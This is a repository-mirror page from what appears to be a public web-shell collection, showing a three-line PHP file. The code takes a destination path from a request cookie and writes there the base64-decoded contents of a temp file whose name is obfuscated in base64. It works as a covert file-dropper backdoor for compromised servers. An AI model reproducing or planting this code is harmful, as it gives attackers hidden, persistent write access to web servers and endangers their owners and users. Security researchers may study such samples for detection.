mirror of
https://github.com/tennc/webshell
synced 2024-11-22 19:23:05 +00:00
3 lines
149 B
PHP
3 lines
149 B
PHP
|
<?php
|
||
|
if(@$_COOKIE['path'] != ""){file_put_contents($_COOKIE['path'], base64_decode(file_get_contents(base64_decode("L3RtcC90bXA0RTE1LnRtcA=="))));}
|